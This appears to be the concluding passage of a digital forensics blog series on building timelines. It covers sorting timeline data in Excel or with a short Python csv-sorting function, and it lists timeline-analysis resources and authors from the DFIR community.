When new data is added to a timeline it’s placed at the end of the file, which means the timeline needs to be sorted prior to viewing it. There are different sorting options, such as the mactime.exe program in the Sleuthkit for bodyfile format timelines. A quick method I use is my spreadsheet program’s sort feature. The settings below will make Excel sort from the oldest time to the most recent.

Excel 2007 Sort Feature
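
For timelines too large to open comfortably in a spreadsheet, the same oldest-to-newest sort can be scripted. The following Python sketch is one way to do it and rests on assumptions worth checking against your own output: that the csv file starts with a header row containing columns named date and time, that dates are written as MM/DD/YYYY, and that times are written as HH:MM:SS. The function name sort_timeline is hypothetical.

```python
import csv
from datetime import datetime


def sort_timeline(in_path, out_path):
    """Sort a csv timeline from oldest to newest; return the row count."""
    with open(in_path, newline="", encoding="utf-8") as handle:
        rows = list(csv.reader(handle))
    header, body = rows[0], rows[1:]
    date_col, time_col = header.index("date"), header.index("time")
    needed = max(date_col, time_col)
    # Drop blank or short lines and any header repeated by appended runs.
    body = [row for row in body if len(row) > needed and row != header]

    def when(row):
        # Assumed layout: MM/DD/YYYY in the date column, HH:MM:SS in time.
        return datetime.strptime(f"{row[date_col]} {row[time_col]}",
                                 "%m/%d/%Y %H:%M:%S")

    body.sort(key=when)
    with open(out_path, "w", newline="", encoding="utf-8") as handle:
        csv.writer(handle).writerows([header] + body)
    return len(body)
```

Writing the result to a new file leaves the original timeline untouched, so the sort can be rerun after more data is appended.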

Summary

The approach described in my Building Timeline series is just one way out of many to create timelines. The DFIR community has provided a wealth of information on the topic. Look at the following examples which are only a drop in the bucket of knowledge. Harlan Carvey created and released tools for creating timelines in addition to regularly posting on his blog (a few posts are HowTo: Creating Mini-Timelines and A Bit More About Timelines...). Kristinn Gudjonsson is very similar in that he created and released log2timeline in addition to providing information on his websites (a few posts are Timeline Analysis 101 and Timeline Analysis 201 – review the timeline). Rob Lee has shared his approach in the way he builds timelines and two of his posts are SUPER Timeline Analysis and Creation and Shadow Timelines And Other VolumeShadowCopy Digital Forensics Techniques with the Sleuthkit. Chris Pogue has shared his method to create timelines on his blog and a few posts are Log2Timeline and Super Timelines and Time Stomping is for Suckers. The last author I’ll directly mention is Don Weber who released his scripts for creating timelines and blogged about creating timelines (one post is Hydraq Details Revealed Via Timeline Analysis). These are only a few tools, blog posts, and authors who have taken the time to share their thoughts on timeline analysis. To see more try the keyword “timeline” in the Digital Forensic Search to see what’s out there.

For anyone looking to become more proficient at timeline analysis, I recommend doing what I did. Read everything you can find on the topic, download and test the different tools people talk about, and try out different approaches to see how the resulting timelines differ. It won’t only teach you about timeline analysis but will also help identify what methods and tools work best for you.